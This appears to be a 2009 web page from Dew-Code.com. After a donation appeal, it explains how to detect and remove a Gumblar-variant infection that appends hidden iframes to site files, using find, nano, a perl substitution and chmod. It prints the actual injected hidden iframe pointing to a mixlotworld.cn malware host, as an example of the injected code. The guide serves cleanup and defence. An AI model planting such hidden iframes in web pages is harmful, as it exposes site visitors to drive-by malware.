DEW-CODE.COM


Many people seem to think Dew-Code.com is run by a group of people, or some big corporation. Well, it's flattering if you have that impression, but the truth is, it's just one person. While I'd love nothing more than to continue giving away my scripts, my time and experience, I do have the same needs as everyone else. If you've found Dew-Code.com, or any of the scripts found there, to be helpful, please consider making a contribution.

For the year 2009, as of 12/16/09, A total of $50 USD has been contributed, or roughly $4.17 per month, for the year. While that is of course appreciated, unless more contributions are received, I will have no choice but to make future scripts available for purchase only.

Regards,
Dewed
Dew-Code.com

Pesky IFRAME added to your site?
Your server may be the victim of a variant of the Gumblar virus.

In short, a workstation legitimately uses FTP to connect to your web server while it is infected
with a trojan/keylogger. What happens afterwards is a bit of a mystery.
Either the workstation itself secretly uploads modified files that include iframes and/or JavaScript,
or the FTP connection info is sent to a hacker who then modifies the files.

Prevention ...
Basically it boils down to changing the password for the affected account from a known clean workstation.
I'd also strongly advise you do away with FTP altogether. With SSH enabled, you can use the SCP protocol
and a program like WinSCP (http://winscp.net) to transfer files. Unlike FTP, SCP encrypts the session, including usernames and passwords.

Removal ...

Using SSH/shell to access the server directly is about the only way to remove this quickly,
so SSH must be enabled on the server. You can then use a program like PuTTY to connect, available here:
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

After connecting, change to your html directory

    cd www [enter]

Locate all files modified within the last day. You may need to change the 1 to a larger number if the site has been infected for over a day.
    find ./ -type f -mtime -1


And/or get a count of files modified within the last 24 hours:
    find ./ -type f -mtime -1 -print | wc -l

Visually inspect one of the files returned. Usually you'll find the iframe or JavaScript appended to the opening <BODY tag:

<BODY ...  ><!-- iframe src="http://mixlotworld.cn:8080/ts/in.cgi?pepsi51" width=125 height=125 style="visibility: hidden"></iframe ->

Sometimes it's after the closing body tag.

The web server used as the iframe source can also vary; in this example it is mixlotworld.cn.

Depending on how many files have been modified, you could manually edit each one using nano, a pretty handy editor...

    nano -w ./index.php
Locate the iframe and put it on its own line:
<iframe src="http://mixlotworld.cn:8080/ts/in.cgi?pepsi51" width=125 height=125 style="visibility: hidden"></iframe>

Ctrl+K deletes a whole line.

Ctrl+O saves the file.

Next, remove unnecessary permissions from the affected file:

    chmod 555 ./index.php

Repeat for every recently modified file


--------  OR, you can automate the removal process using Perl, assuming the iframe target is mixlotworld.cn. find has to hand each file to perl with -exec; piping find's output into perl would not pass the file names as arguments, and the non-greedy .*? keeps the match from swallowing everything up to the last "iframe>" on the line.

    find ./ -type f -mtime -1 -exec perl -p -i -e 's/<iframe src="http:\/\/mixlotworld.*?iframe>//g' {} \;

If the iframe points to some other server, change "mixlotworld" accordingly.

Finally, change the permissions (again via -exec, so chmod receives each file name):

    find ./ -type f -mtime -1 -exec chmod 555 {} \;


You'll find further info, much of it opinion, about the Gumblar virus at the following:
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
http://www.bleuken.com/2009/05/06/removal-and-prevention-of-gumblarcn-infection/
http://www.iss.net/threats/gumblar.html
Copyright Dew-Code 2008